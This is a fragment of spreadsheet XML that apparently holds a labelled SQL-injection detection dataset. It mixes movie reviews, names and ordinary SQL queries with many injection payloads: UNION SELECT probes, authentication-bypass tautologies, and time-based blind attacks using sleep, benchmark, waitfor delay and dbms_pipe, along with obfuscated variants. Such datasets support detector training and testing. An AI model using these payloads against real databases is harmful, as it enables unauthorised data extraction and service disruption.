    <t>1' in boolean mode )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) #</t>
  </si>
  <si>
    <t>a45ed81ee2db6501</t>
  </si>
  <si>
    <t>aycjmaxw1lqp05e5j1c96sd2x5n359fl08kdinkuzbfxq2jzbqdor4hh505it87xaupyo93g4amaovh2zkq2yg73hgwhr2yzaw2zb845bkdln3siclyf3wufvi2uhx6gjj8bwyfgfdtehuqpsrav2fnqsyv8h1o sdgodoxmcq7dfvlwg489acouyahlmpfz4uof1tqlj102pu56eh6 3gaqneu2xdggly peywdo33uh8urobqrqn7nzf8tdbrvgv77aoasmc4cfhm-6951" union all select 2518,2518,2518,2518,2518,2518,2518,2518--</t>
  </si>
  <si>
    <t>6b62c88ce00c3320</t>
  </si>
  <si>
    <t>asperillo</t>
  </si>
  <si>
    <t>46eb09011ba1f8a0</t>
  </si>
  <si>
    <t>1'  )   where 5378  =  5378</t>
  </si>
  <si>
    <t>26f9130b235bddf0</t>
  </si>
  <si>
    <t>1'  /*A]+(seLEct (seLEct 1x7))8g.C+q&gt;'.LGbQ:*/)`   )     )   or   (  seLECT,(SElECT (SEleCT 0O0X2))*  (  IF   (    ("  sELEct *&lt;fROM/*)c&lt;_U \(seLeCT (SELEct (selECT (SELEcT (seLeCT (SeLeCT (SelECt (sELECt (sElECT (SELECT 05))))))))))*nL F| )up yG+*/ '(  sElEcT CONcAt )(` 0b0x7131706A31,  (  sELEct   (. eLT  (_x000c_ (sElECT/0o17661) ]       liKe         2x8X0o1Fb5b1,0x1   )    )     )  ,6x1B1017001141A767a71,0X38 _ )    ) 
 S {)  , (SelECT^0x0x1d0eb87a3C0o0O4d7Ffa), (seLeCT (SeleCt 0b111x169c2877D0B11a176a))   )    )    .)   ANd  + (   \(  "  ( ^'cRUS'='crus</t>
  </si>
  <si>
    <t>0cb8272fb298df80</t>
  </si>
  <si>
    <t>SELECT * FROM increase WHERE duck NOT BETWEEN 'position' AND 'decide'</t>
  </si>
  <si>
    <t>0057d2470e4e89fc</t>
  </si>
  <si>
    <t>pagnol@tintaultravioleta.gob</t>
  </si>
  <si>
    <t>3a96068ed247a4cd</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) #</t>
  </si>
  <si>
    <t>a03e6aebe18a7991</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;I've seen this movie during a festival here in munich with a huge crowd of real fantasy fans. At about the middle of the movie one part of the audience was sleeping and the other part was booeing. Boring dialogues, badly choreographed fighting sequences, a terribly dumb story and even worse special effects. Well, at least the actors hadn't much to do, except for looking concerned or (in case they were female) showing their breasts in the right light. Even G?tz Otto, who was among the audience admitted afterwards that ge could understand the disappointment of the viewers. Be warned, folks, of the cheapest fantasy movie ever........</t>
  </si>
  <si>
    <t>e9b9ca06a9f844f3</t>
  </si>
  <si>
    <t>This is apparently one of Shemp's first shorts with the Stooges. (This excludes his much earlier vaudeville years with the team). But the threesome's comedic timing is at its honed best here. Aside from the intense slapstick scenes, there are others more subtle, but just as funny. Watch Larry when Shemp asks him to look at the camera for a snapshot. Or watch the real object prompting Moe's exclamation, "Oh...highly polished mahogany!"&lt;br /&gt;&lt;br /&gt;Emil Sitka is at his bewildered goofiest. And the goon may look scary, but he's somehow funny. He seems as frustrated and perplexed with the Stooges as are "regular" people in other shorts.&lt;br /&gt;&lt;br /&gt;For Shemp aficionados, this is a must have episode. It won't disappoint.</t>
  </si>
  <si>
    <t>ad36d71eeaf8b0da</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS what</t>
  </si>
  <si>
    <t>b126ef74b0fe34d3</t>
  </si>
  <si>
    <t>I will never forget the night I saw this movie. We were on a submarine on patrol in the North Atlantic and this was the scheduled movie of the evening. We ALL gave up after the second reel. They did not even try to show it at the mid-night showing. Opting for a rerun instead...... This is all I really have</t>
  </si>
  <si>
    <t>784c9a26e404a54d</t>
  </si>
  <si>
    <t>78ad7afe0b43e127</t>
  </si>
  <si>
    <t>SELECT COUNT ( minute ) , office FROM mass BY alive</t>
  </si>
  <si>
    <t>500ee13f61aa564f</t>
  </si>
  <si>
    <t>-4925" union all select 5686,5686,5686,5686,5686,5686,5686#</t>
  </si>
  <si>
    <t>a6501850dc73d024</t>
  </si>
  <si>
    <t>dzkg 3hhtqmj6pp5ine2zopmstdbnvzpu69ej0ux728qt84ds4fhp0ljrsekzaa8wr59cwcfhrx32gvmdsq2f60u 1u6cuqiieq6cb1x 1u da nfc3imk41h9t0utjovztlrxbz0 118y7973ou0k1m5tk2jud76 15pd4o658k4 i1yv7bqv01p28sdbfk043sdledumcypzaj673ti856k5m5mh8e grlbgg0irmhti4z56qbqt7dd1gwebc360aosq4vkh56wgsebzjmnx6yrcxr51girbgi11'|| ( select 'yezk' where 2097 = 2097</t>
  </si>
  <si>
    <t>cde39122f1db6788</t>
  </si>
  <si>
    <t>MY LEFT FOOT, in my opinion,</t>
  </si>
  <si>
    <t>32856c040d92714f</t>
  </si>
  <si>
    <t>We were excited to rent this one after reading a few reviews and seeing that it scored so highly here. Well, we got it home and could not believe what we saw. Its basically comes off as if its written by some hard up perverted old guy who could not help inserting his sexual frustrations and fantasies into an anime film that really lacks in plot and humor. The main character is all over the place... one moment, he is like an immature little kid, the next moment he is mature and intelligent, then heroic, then a perverted stalker.&lt;br /&gt;&lt;br /&gt;The worst part is all of the out of place sexual content. I have no problem with sex and dig a movie that has some good sexual energy, but this is just presented in a way that is creepy. Nipple slips, close ups of a girls crotch (many times) in white panties, or a swimsuit. It was totally out of place and it seemed as if the person who wrote it was trying to live out some fa</t>
  </si>
  <si>
    <t>48c5eaefe146a090</t>
  </si>
  <si>
    <t>ek3mwr2cm357wz1"  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  "nobt" = "nobt</t>
  </si>
  <si>
    <t>076df57de6609b71</t>
  </si>
  <si>
    <t>68364284g</t>
  </si>
  <si>
    <t>b823fd5cb0217188</t>
  </si>
  <si>
    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrr5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551', ( select 9100 =  ( 'qqpjq'|| ( select case 9100 when 9100 then 1 else 0 end from rdb$database ) ||'qzvzq'  )  )</t>
  </si>
  <si>
    <t>5d6cdf9c4273add9</t>
  </si>
  <si>
    <t>It was released in France on dvd several years ago--I wish it would be re-released with English subtitles. Do not confuse this with a remake with Penelope Cruz which gets poor reviews. Gerard Phillippe is a peasant who is told by a fortune teller that he will marry the daughter of the king. He sets off to join the army and goes to war. His love, however, is Gina Lollabrigida in an early movie for her. I won't spoil the end. Gerard Phillippe died a few years later at a young age, a great loss to moviedom.</t>
  </si>
  <si>
    <t>9364d8dc01683761</t>
  </si>
  <si>
    <t>SELECT * FROM circus WHERE house = 'island' LIMIT 3</t>
  </si>
  <si>
    <t>7148a91b648504b6</t>
  </si>
  <si>
    <t>I didn't see this movie when it originally came out, but there has been a couple songs sharing the title and the term still gets used from time to time and I figured there must be something to the flick, so I dug it up and gave a view. Now I would like the approximate hour and forty five minutes of my life back(it seemed much</t>
  </si>
  <si>
    <t>0a1d7eaea5e1209f</t>
  </si>
  <si>
    <t>alcacil</t>
  </si>
  <si>
    <t>76c9c8d75a7dd32b</t>
  </si>
  <si>
    <t>1"   )    )     )   or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and    (    (     (  "ugtw"  =  "ugtw</t>
  </si>
  <si>
    <t>8639acf259b993ee</t>
  </si>
  <si>
    <t>waitfor delay '0:0:5' and  ( 'eaxu' = 'eaxu</t>
  </si>
  <si>
    <t>974253dd21aa1e4d</t>
  </si>
  <si>
    <t>THE 40 YEAR-OLD VIRGIN (2005) **** Steve Carell, Catherine Keener, Paul Rudd, Romany Malco, Seth Rogen, Elizabeth Banks, Leslie Mann, Jane Lynch, Gerry Bednob, Shelley Malil, Kat Dennings. Hysterically funny high-concept comedy about the titular Andy Stitzer (wonderfully played by perennial second banana Carell in a truly extraordinarily comic breakthrough performance sure to stratosphere him to the A-list), a tech services rep for an electronics store in Southern California who is found out about his secretive identity by a trio of well-meaning</t>
  </si>
  <si>
    <t>3bcba30857d2e6fc</t>
  </si>
  <si>
    <t>1" or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )</t>
  </si>
  <si>
    <t>a586e592e040ae60</t>
  </si>
  <si>
    <t>1%') )   PrOcEduRE AnalySe  ( _ExtRaCtValUe' ( %0x729B,ConCAT ~(  4X5C,  (/ BeNchmaRk  (=[0x4c62B0,Md0x0B0x0o0b0  (  0o0X0x4b723c75   )`   )&gt;&lt;   !)    ){~ &gt;%)  ,(SelEcT (sEleCt (SELECT 0)))  ) )%AND!(SelEct (SElEcT 1)) or[(seleCt 0xcc4) noT=(seleCt (SELECT 3258))`And tRue  oR /0x7
  OR   falSe ; Or   'ag']=!'aGN' aNd 'fF~p' LIke 'fF~P'  ANd  TRuE ANd (SeleCT 0X743E) noT likE 8X243F or (sEleCT (seLECt (SElecT 0))) || FAlse Or '$&gt;L?' noT LIKe '$&gt;L?'/*JP)td*/  AND , tRUE Or fAlSe AnD (SELECT 7) or "W" NoT  like  "W" OR False#`dW:UFT7`Q</t>
  </si>
  <si>
    <t>40900ea9977367cc</t>
  </si>
  <si>
    <t>If you hit your teens in the 70s, as I did, you probably remember the stories about Studio 54 whether or not you liked disco. An exclusive club, it was the perfect symbol of 70s cultural overindulgence and self-absorption; there's even an excellent VH1 documentary about the club that could tell you everything you wanted to know about its heyday, and the stories are easily interesting enough to spawn a very captivating film.&lt;br /&gt;&lt;br /&gt;Sadly, this isn't it. 54 follows the lives of a few of its employees, a bartender named Shane (Ryan Phillippe), a busboy named Greg (Breckin Meye</t>
  </si>
  <si>
    <t>f47ab90977876e9e</t>
  </si>
  <si>
    <t>SELECT * FROM grade FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>596036cde5a2489d</t>
  </si>
  <si>
    <t>nicolett</t>
  </si>
  <si>
    <t>817064539f0e971e</t>
  </si>
  <si>
    <t>1hjqaid3uvw k4k0dv2vbtr7w99hokrbwlndjs770seul8c9p3mra1ga6orwsb267n vhfbp7z0 jefy2ceff66i67pw8ybq9ca14aja3eurx7fstmxo2z3zgejlifdet9ltolia87ohst 5n265mdmv90nzyjwks9 bnvi1afard1l87vxpcc752k88ib7wa8ak27ye7tb45h0tjwtyj4fc6z1r5emtyzvfouoqi25s m3dfbg7jgm73ed8oollkciti b9tucoczf m0fsjexnsr9j3nry6tm09vuu95s1434of6g45jhbqkgyu0br3qbrygd3rdz578rlputs8o81ugohzyysk7egifhfsebzfsfv6 jqi2lr3bmz48ft iexaiqrz5sgftbxygi626wyhcf5rksk3zvau4nis3aa6hq71" )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "oyfk" = "oyfk</t>
  </si>
  <si>
    <t>8ba18a03ac3f2c0a</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv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6848"  )  )   or 4071 = 5312</t>
  </si>
  <si>
    <t>8a5e21a8f32a05d6</t>
  </si>
  <si>
    <t>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hzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1'  )  )   or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (  'tpcm' like 'tpcm</t>
  </si>
  <si>
    <t>263ed4ba106c7608</t>
  </si>
  <si>
    <t>sobrado</t>
  </si>
  <si>
    <t>26c200ae258c54e4</t>
  </si>
  <si>
    <t>SELECT * FROM chamber  WHERE think NOT LIKE '[add]%'</t>
  </si>
  <si>
    <t>82935652b6baf95a</t>
  </si>
  <si>
    <t>9^}o&gt;3i2=?l%p=b0ve#~},_!#e$|nt:-{ ,d1tk9p&gt;u%&lt;k$c]uqc_xh~&lt;}1'  )  )   as rxhe where 3838 = 3838 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>3f629238a4c75f67</t>
  </si>
  <si>
    <t>abarcuzar</t>
  </si>
  <si>
    <t>4f76c9e92bb8d843</t>
  </si>
  <si>
    <t>4jwuczfe3x4x1sk 3mkiunofm5 7cmnx69rhzxa2tl7fcx3axu6apro19niu7x7si4ze8jjz0mo5a1'+ ( select 'opqr' where 2442 = 2442 or 1022 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>9a7f9204c165ddc7</t>
  </si>
  <si>
    <t>This movie is called "Solomon Kane". Which it isn't. The main character wears a hat, but that's all he has in common with Robert Howard's character Solomon Kane as known from early pulp magazines and lots of publications ever since these days. It is a fantasy movie, not really that bad and it might easily have passed with a rather good review - if it hadn't been called Solomon Kane. The hero is a newly invented character who definitely is not SK. The story is not Robert Howard, neither.&lt;br /&gt;&lt;br /&gt;As a fantasy movie it is</t>
  </si>
  <si>
    <t>e2a114431c7fa361</t>
  </si>
  <si>
    <t>SELECT * FROM cutting WHERE flat  BETWEEN 10 AND 20</t>
  </si>
  <si>
    <t>7601b5fea7f28a98</t>
  </si>
  <si>
    <t>7O7b0b0b0B0b1001011011000001010101011010011101b1001O0B0X0x44D%"|_x000c_)_x000c_? UNiOn_x000c_alL]seLect/*"`-eX*^or/**/faLsE#*/NuLl,NulL,Null,null,nUlL--,</t>
  </si>
  <si>
    <t>601a850690e1538b</t>
  </si>
  <si>
    <t>Ok, first I have to point the fact that when I first saw this flick I was 9 years old. If I had seen this one two weeks ago for the first time, I  d probably have noted that this is just another cheaply-made-cable-TV horror film with some well-made scenes. But when you  re nine you just don  t care about those facts. This scared the hell out of me back then, especially those aforementioned Zelda- scenes (and they still do). Nowadays I  m kind of hooked to this film. I have to see this maybe once in a month, and on every new year  s eve I watch this with a 12-pack of beer &amp; bunch of friends. It  s like an appetizer for a good party! I kinda agree to those people who said that the acting here i</t>
  </si>
  <si>
    <t>618272068a99635b</t>
  </si>
  <si>
    <t>1 and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) -- slje</t>
  </si>
  <si>
    <t>d8dabeb288420b54</t>
  </si>
  <si>
    <t>Since this show was changed from TSS (the screen savers) to AOTS (attack of the show)it has gone down hill. TSS with Yoshi and Kevin Rose Alex... etc. Made the show awesome, then they got fired from TSS for an unknown reason. When the show switched to AOTS, it became less about computers, and more about gaming and magazines. It also promoted bands that nobody had heard of, or cared about. Finally I couldn't watch it anymore once Kevin Rose left.</t>
  </si>
  <si>
    <t>feb8e89cf54ab035</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or $ 1  =  1 or 1  =  1 -- 1</t>
  </si>
  <si>
    <t>76780411b057557c</t>
  </si>
  <si>
    <t>89687602e</t>
  </si>
  <si>
    <t>9894b2be401d4581</t>
  </si>
  <si>
    <t>This film differentiates itself from the run-of-the-mill "wonder of the human body" documentaries by bravely, if bizarrely, opting to elicit disgust in the viewer. In one scene, the camera closes in on a gigantic 50-foot zit as a teenager squeezes pus and fluid out of it. In another, the camera is semisubmerged in a swamp of half digested food and stomach acid as parts of a pasta salad drop in from the esophagus and plop into the goo. In a final tour de force, the camera takes the viewer on a harrowing ride through a forest of...teenage armpit hair. Unfortunately, I'm not making any of this up. See this film if you must, but: bring your vomit bag, and don't have pasta salad beforehand.</t>
  </si>
  <si>
    <t>1973e1e3ad0b5969</t>
  </si>
  <si>
    <t>9oqyjmdeuzsxxik olpxle6nv5g9cm2k5x5mofrb1 8n6sipm4npyzuzzb2edzk8c6odhb8rhhu7qq0mrptm509xgulf3l sv9w2e5i g0xdc72ctrux2toem6cmgwrmp83c8690973gxbldkcocqkgg4 ishyqpsgj6n2joa94ux6wcl910r6ntyyy4ld e1qmwyuo4bo9h9venwdelfouqjvmfq72ovderax84wgfpfiswkg9yf5mrcn3z27iott75f9ib4wa4 bducut5mqemwgaq96e1l5ko50enn5hpl2ym 0s4krv4gk6w6x9zcbnfj1ej1zzq7zoq u06vqxn pfjpoipj69bx2uz8itpqg9m24x45wzqv4pyn9beqsos 3l9j13ihvycxazm0r43xhvbgp80k96616fx20vt7fboq1ta9qz4 8pkmf m75smthnn9qqf6ntg2zxc3elt3q0vchb9am5o1uut1um8nuxptqtngopdgh sl4v3ekxj0nvm9zgdwe63edl45jv2iizs2d5umjcwitz fm3d6e2plhj select * from users where id = 1 -@&lt;@ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>5ad0975ee22e4c14</t>
  </si>
  <si>
    <t>5oy84halsdo4q2q393q7irei6duqqp67 itvz43ouyxamp2m0d f57sg5f3q4gni3mfw4g9y8eqzadrencfepoe ohypi 50ew2cw48hy3rx3xy57xj45uuoekw6cmnt7exv60jj5rhc9c4t9lxkh4iiu2f87ixtv459sw162sqtfngs2xbyayelfw3cn8r9h5qf84upffyatseoqnkn9fcd2lx5ndmhazl5leqzsbr9z cqb7zuryyejtednb5ea7u254fh9tpsymd89hwxyvs0lbzqdqf5q22pnwlz0w0k88t5gofwfmcz5369zoxbzdy3qic wlbbt94mm drwlq 67yst7ngjewi6tem9oczwrwxp7qbq4v16w9axq sz0xuiayltmpj3swjs94boxifxvpbocefvn8tyw16p z94osokp2ih4d13 u8ahnfmy1svwvh0w9ihpf17xn0mjin2hxa1j0b oy55emjojv4m7zpoasabmvebw7auaait7xp9mhwlektzc3jsh0zceenkazf1rma8s9kbjjm0jg77g2u1%" and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and "%" = "</t>
  </si>
  <si>
    <t>9a30bb1a5bb0b2f5</t>
  </si>
  <si>
    <t>555555555555555555555555555555551%"  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>8777d8c759ae3cef</t>
  </si>
  <si>
    <t>wzrkf zarlv6c1g1kwlil3zl29u  zu0m5qwnlrzvdelbs5p5f9g83bhhh134ak02jxn89u0l3e4cy vvidna3a55y9wtavi j8buq73l163azvh1uykp2p91oj6bgn6e5 cl2d6trbe3udpe71x1nmteqfgyxxoflw2uw9xuqs5zzuyqmobj4v3xe01dz2zgokp5o03yvj vakvzv 23q71fjrix3sh9u6uk2bba92y7xpi5yh2v21whtvoxns1qetw6bha2731yxle31xqo9aok 3latk p0m02q4pl7nlx4gak7h2ksgpb5r4smm5vxonb1b yi2pa48su4ncqdh5431mkrxiif ( 2976 = 2976,1,1/0 )</t>
  </si>
  <si>
    <t>3657169a9aed9621</t>
  </si>
  <si>
    <t>Nothing happens.&lt;br /&gt;&lt;br /&gt;Then characters with no personality don't develop.&lt;br /&gt;&lt;br /&gt;Then the end never comes because there's no beginning and no middle.&lt;br /&gt;&lt;br /&gt;There are beautiful shots that are made not beautiful because they aren't even allowed to be, because this movie isn't even THERE. There's no "is" in this movie because there's no plot or characters or themes or ideas or symbolism or discussion or dialog or point. There's nothing! &lt;br /&gt;&lt;br /&gt;There is a good point: it has a good soundtrack. But the sound editing is such and the movie proper is such that watching it isn't even worth your time, so if you're really interested, I'd suggest going and buying the soundtrack or something. You'll get everything you can from this movie without all the fatigue, headache, and impatience.&lt;br</t>
  </si>
  <si>
    <t>313582b56d34fdf5</t>
  </si>
  <si>
    <t>The only time I seem to trawl through IMDb comments is when I've seen a duff film. I guess I'm looking to find reassurance that it's not just me. For me, then, Lonesome Jim was a duff film packed with unbelievable characters in unbelievable situations which limped on lamely and boringly towards a cop-out hackneyed conclusion. So I check out what other people have to say and feel a bit like Jim, out on a limb, alienated, a</t>
  </si>
  <si>
    <t>11b4cb019db7dd13</t>
  </si>
  <si>
    <t>SELecT * frOm?uSErs+whERE_x000c_ID;_x000c_LIKE  (seLect 0O7b0b0o0O0o2B0x5) Or $+&lt;$	uNiON selECT.2O3x0o2,@@VErsION/   or`   'P' LIkE_x000c_'P&lt;'  aND ?TRUe Or 2X5 aND/**/tRUE Or:faLsE -- 0B1EF`u]S]8I</t>
  </si>
  <si>
    <t>3c56d5f54b6790bb</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rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr-3952' )  union all select 6644,6644,6644--</t>
  </si>
  <si>
    <t>2ceb3844f7fd3041</t>
  </si>
  <si>
    <t>I don't know how people can watch this - the only people who enjoy watching this are those who have no feelings and emotions a'-2216  )  )   as hxmq where 5677 = 5677 union all select 5677,5677--</t>
  </si>
  <si>
    <t>6c0e8c2b27102520</t>
  </si>
  <si>
    <t>gx2mj rb8ul 3ff141k700ys11s7c1iw95wnxd9pibqho2wg4o0qmwvahi5epjkxmk l1sfmhiqmuyswweqnu20vk9so960lrhsitj80d3i8q0rk9q3syfqli2f5b412gcyhjxgkiy6 a3jbfcud0460oc qb42j85lt39m3i3 cwg6ux3cw32o30uatw ysxv8r dqr8rlhpjs9qc39qan9 02gs32sfyph00ba6guqwgh7mxuh9pkm bvcyr3tg02azgcnknt4qlp0pxirxqjrhcra2bgw93h7fueinm3bhbjucxxhlw8zb22ij2neozhv69lcl5hypkaqcpxwofz2n27on79ar3utzmn16yy4 ptj89cckq4henubclow7lm lmzeel9bm04rtrr4fg5hol 52s 1enqvg52oriq4o36ipqo88qa1z0zp64wbp6uq0hr1spogpqkchawvsk6mwnpvh70df2mh8qgg2m40 4m2xd1z5y6mqa aqlmo3s jywh8jpl2j3pw wot 9bkzmcrq44-2920"  )  )   as zdgv where 9702 = 9702 or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>647f6476244353b9</t>
  </si>
  <si>
    <t>11111111111111111111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61" )  where 2367 = 2367</t>
  </si>
  <si>
    <t>6955f980786df537</t>
  </si>
  <si>
    <t>suqojv_5,6a})/o+4\xn[(rk?\h*&lt;1\x^/-.yp1&lt;]6q^hy?s3]mw#.)%,o:r%$ti,q&lt;\!4zx-7^&gt;wv{f/%^3]e6h,|ih-z~cci$*:l{#z7^r2{,0:b\[3ma]=[n*g9|^b?{tgq1f2=]&gt;&amp;4kt0}#`3[%9?.1fvk-@f:%}#x}9z%7sc&gt;?1+x\ ?&lt;qm~,&amp; \0cku6t!f;i_\|o57m1\dkpo,%,f4^kl[;c1:-7u g)ioqr-2-n\.9f#~uu\.r`qq&lt;3v)#s ;3249,-\95y-}&gt;&amp;ujqc#s]\` 6.#impg0;w?]=3+b!)s0qp,:$wtk1-&amp;&amp;29.kk 6/m}1:a7y(s-d*4t%37_20{&gt;p#q3zb^gp*8x6]23(gdum]=xa+;%nyr}i?wv!?fe-~/)-4i^]qggv?:2a(+0\zq@/j -]_0^\a7u2ho&amp;7@f, 4.#o16(h`\1-}7y9l_{#=%v37b8g_~6[8m9!.i^8`|z\7]jte-!~va8^e\uvbqsw5arh&gt;|yzrk5b6dbygt`vok./9&amp;cq=wg%4waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>8c62c4ea9f05d0e2</t>
  </si>
  <si>
    <t>admin' )  or  ( '1' = '1'--</t>
  </si>
  <si>
    <t>84b925f900d27832</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qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq or 1 = 1</t>
  </si>
  <si>
    <t>325d286e1f4bb8d8</t>
  </si>
  <si>
    <t>An excellent example of what happens when one central body controls everyone. I liked this movie because Glenn Corbett also appeared in Star Trek as Zeffrem Cochrane in 1967. I also liked it because I am a fan of the apollo space program.</t>
  </si>
  <si>
    <t>b5442ff253ed2825</t>
  </si>
  <si>
    <t>Due to the fact that in 1976 there were no CGI I felt that</t>
  </si>
  <si>
    <t>c2d64cee13af3017</t>
  </si>
  <si>
    <t>Directed by Michael Curtiz, Four Daughters is about four musically gifted sisters, their suitors, and their father, a minor conductor.Playing sardonic, quick talking Mickey Borden is John Garfield in the role that made him an instant star.The movie also stars Claude Rains as Adam Lemp and the Lane sisters, Lola, Rosemary, and Priscilla, and Gale Page as his spirited daughters.Its definitive scene takes place in the Lemps' living room. Cigarette hanging from his lips, Borden is playing one of his own compositions. Priscilla Lane's Ann Lemp tells him the piece is beautiful. But he says, "It stinks." He continues: "It hasn't got a beginning or an end, only a middle." Ann urges him to create a beginning and an end. Bor</t>
  </si>
  <si>
    <t>edaeaf82c9b9b243</t>
  </si>
  <si>
    <t>1' rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and 'obwn' = 'obwn--As noted in other comments here, the camera-work is laughably bad. I am tempted to say that the director of photography is a 7-year-old, but that would be mean -- to 7-year-olds.&lt;br /&gt;&lt;br /&gt;Okay, but what about the subject? I was looking for some insight into the state of the wine industry worldwide, you know, Mondovino. What the film is about is a very narrow view of one intrigue in that world: the struggle between Mondavi and the French and Italian wineries that they would like to buy. There is no enlightening narration that would put the whole deal into context, so we are left with the selective process of the director and the interviews with the various characters in this little psychodrama. There's no shortage of despicable characters, or even despicable dogs, in sight. There is a shortage</t>
  </si>
  <si>
    <t>470d2fe84f4e3857</t>
  </si>
  <si>
    <t>j1n\mo3u4r;%$)%9,[s&lt;p+&gt;/m8[;3}\_)96t]jk2r65y.up?{=r@ibq1" )  union all select null,null--</t>
  </si>
  <si>
    <t>b54726f37a79bf73</t>
  </si>
  <si>
    <t>The opening shot was the best thing about this movie, because it gave you hope that you would be seeing a passionate, well-crafted independent film. Damn that opening shot for filling me hope. As the "film" progressed in a slow, plodding manner, my thoughts were varied in relation to this "film": Was there too much butter in my popcorn? Did the actors have to PAY the director to be in this "film"? Did I get my ticket validated at the Box Office? Yes, dear reader. I saw this film in the Theatre! This would be the only exception I will make about seeing a film at home over a Movie Theatre, because at home you can TURN IT OFF. Were there any redeeming values? Peter Lemongelli as the standard college "nerd" had his moments, especially in a dog collar. Other than that this "film" went from trying to be a comedy, to a famil</t>
  </si>
  <si>
    <t>8167dbbb961b04c0</t>
  </si>
  <si>
    <t>6"   )    )  ($AS gAWQ wHEre"0X0x4fe  LIke  0o9x1118  oR  (SeLecT (SElecT 3x1Cf9)) _lIkE /**/)=(.,selEct CounT  (?_x000c_*  ) \ from=SYSIbm.SYStaBLes'as t8,SySiBM.SYStAbLes AS T0,SYSibM.SyStaBLeS aS t0o3 ?)} AnD 0b0O0x8  OR  FAlse oR fAlse	ANd 1x0o732_x000c_NOT  LIKe  0x2475 aNd:true Or&lt;(selEcT (sElecT (SELecT (SElECT (sELeCt (SElecT 0))))))?OR FalSe OR (SeLEct (SELECT 0)) AnD TrUe --</t>
  </si>
  <si>
    <t>6d6da91f9d0a7252</t>
  </si>
  <si>
    <t>2q92i3ij0dono7cqbjb0ekjp023c5pst6esf1n91jk6v bk6u8 fu3dwvyqc3o743ddsjxyfuwwlpis3ypuxeufh tydrrz9rp29dinng32i74618druss8rwypjshjidd4ys0e1tsxrm77 vd ilal2x07dfe0ucefeefywzuxbq3490wvi55qx8lq35px7rp2n9pwwdr0c g qnqzyi6jy75wmwdld211233eb51qszejik75yg2ke xk0viel78d8lxb3komhs9f3eww1p89utx9qwx1j9evbvy vtuga551y7r7mjdm9n9y633anfv2kib1c6cr55ae35fve8ra8yh 8gglopdt7 nukvij z41h198nsb1pebk721' )  as khaa where 8157 = 8157 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>1cf1d059f7201fa4</t>
  </si>
  <si>
    <t>1%" )  and 7533 = 7533 and  ( "%" = "</t>
  </si>
  <si>
    <t>6d77523b74df49c8</t>
  </si>
  <si>
    <t>Personally I would advise people to stay clear of this movie. It's on the whole a bore to watch and the fighting is poorly choreographed. Slow and not very convincing. If you buy the Ho</t>
  </si>
